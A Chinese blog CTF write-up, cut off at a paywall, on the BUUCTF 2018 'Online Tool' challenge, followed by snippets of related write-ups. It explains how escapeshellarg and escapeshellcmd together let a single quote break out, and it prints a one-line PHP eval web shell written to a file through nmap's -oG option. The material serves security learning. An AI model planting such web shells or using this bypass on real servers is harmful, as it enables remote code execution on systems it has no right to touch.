[BUUCTF 2018]Online Tool PHP代码审计

最新推荐文章于 2025-02-12 00:36:23 发布
最新推荐文章于 2025-02-12 00:36:23 发布
阅读量285 收藏
点赞数
分类专栏: buuctf web 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_46412682/article/details/107973097
版权
这篇博客主要探讨了BUUCTF 2018中在线工具的PHP代码审计问题。文章指出,nmap -oG 命令可以用于写入文件,并详细解释了如何利用escapeshellarg和escapeshellcmd函数来过滤和转义特殊字符,尤其是单引号,以防止注入攻击。通过具体的例子,展示了这两个函数如何影响字符串的处理,最终得出结论:在处理用户输入时,必须谨慎使用这些函数以确保安全性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BUUCTF 2018]Online Tool PHP代码审计
题目一开始的一段代码
在这里插入图片描述
这里的知识点是nmap -oG 可以写入文件
例如: nmap <?php eval($_POST['cmd']); ?> -oG 1.php

这里是host传参,但是不能直接写入,因为前面有两个函数过滤单引号之类的特殊字符
escapeshellarg的用处是有单引号就会在前面加个\转义,并且将两边的字符用单引号括起来,例如:

$host = "a'";
escapeshellarg($host);
echo $host;
输出 'a'\'''
\'是转义单引号

escapeshellcmd与上面的函数有所不同,它只会将不成对的单引号或\前加
例如:

上面输出的字符 'a'\'''
$host =  "'a'\'''";
escapeshellcmd($host);
echo $host;
输出  'a'\\''\'
单个\所以前面再加个\,前面两个'把a闭合了'a' ,后面''闭合了,只剩最
后面一个单着的单引号,所以前面加一个\

所以我们再host参数是变成
?host='<?php ev

最低0.47元/天 解锁文章
BUUCTF学习(三): PHP 代码审计
初尘屿风的博客
10-16 200
PHP 会根据变量的值,自动把变量转换为正确的数据类型
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
[BUUCTF 2018]Online Tool
bazzza的博客
12-25 334
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 escapeshellcmd — shell 元字符转义 escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任.
BUUCTF-Web-代码审计-[极客大挑战 2019]Secret File
weixin_42566218的博客
02-23 750
BUUCTF-Web-代码审计-[极客大挑战 2019]Secret File 题目链接:BUUCTF 代码类型:php语言 审计难度:低 知识点:字符串查找函数stristr()、文件包含函数include() 解题过程:解题步骤在这篇文章中 审计过程 secr3t.php <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(stristr($file,"
1.【BUUCTF】[极客大挑战 2019]PHP(反序列化)
最新发布
2401_86760082的博客
02-12 1250
打开题目页面如下很有趣的前端页面,猫猫会随着球的方向目光跟随,靠近猫猫还会把玩球看到提示备份网站,但不知道备份文件名,用kali中的dirsearch扫描根目录试试扫描特定的后缀,命令如下结果如下看到有www.zip构造url看到下载完成,打开查看有如下几个文件打开flag.phpqyq,果然不可信,没那么简单打开源码文件index.php看到里面的php语句,直接开审include 是一个文件包含语句作用是将指定路径下的文件 class.php 的内容包含到当前脚本中。
BUUCTF】easy calc (PHP代码审计
徐徐徐的博客
09-04 542
删除空白符转化特殊字符可以使用在参数名前加%20的方法进行waf绕过");");");");");读取文件内容的PHP语句将上面的函数改为即可。当对引号进行过滤时,可以使用chr()拼接的方式进行过滤。
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 3165
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 455
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
【学习笔记15】buu [BUUCTF 2018]Online Tool
weixin_43553654的博客
05-15 688
打开一看,发现给了一大串代码,接下来进行审计 if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR']; } //首先看到前两行代码X_FORWARDED_FOR和REMOTE_ADDR这里是让服务器用来获取ip用...
[BUUCTF 2018]Online Tool1
m0_73673698的博客
06-08 960
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
[BUUCTF 2018]Online Tool 1
m0_73728268的博客
04-21 202
1.关于函数escapeshellarg与escapeshellcmd函数漏洞的利用。2.关于nmap工具的使用。
buuctf-PHP
xixihahawuwu的博客
11-23 1295
看题目说备份网站,扫一下看看 把文件下载下来 一些源码 这里的unserialize涉及到一个反序列化 接着看class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ .
BUUCTF-PHP
z1moq的博客
09-07 1103
启动靶机,打开网页发现有提示说存在备份文件 直接使用 www.zip 下载备份源码 在 index.php 中发现反序列化函数 此文件包含了 class.php 所以继续前往该文件进行审查 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __con
命令执行 [BUUCTF 2018]Online Tool1
m0_75178803的博客
12-15 1053
打开题目我们代码审计一下如果存在xxf头且不为空,则将xxf头内容(真实的客户端ip)赋给ROMOTE_ADDR(代理服务器传过来的ip地址)这段代码主要是为了处理通过代理服务器访问网站时获取正确的客户端IP地址这里需要注意的地方:1.没有对XXF的值进行过滤,可能存在XXF注入攻击2.XXF头部可以被客户端伪造如果get姿势传入的host为空,则会使用函数来将当前文件的源代码高亮显示输出。
buuctf php
ANYOUZHEN的博客
05-24 346
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值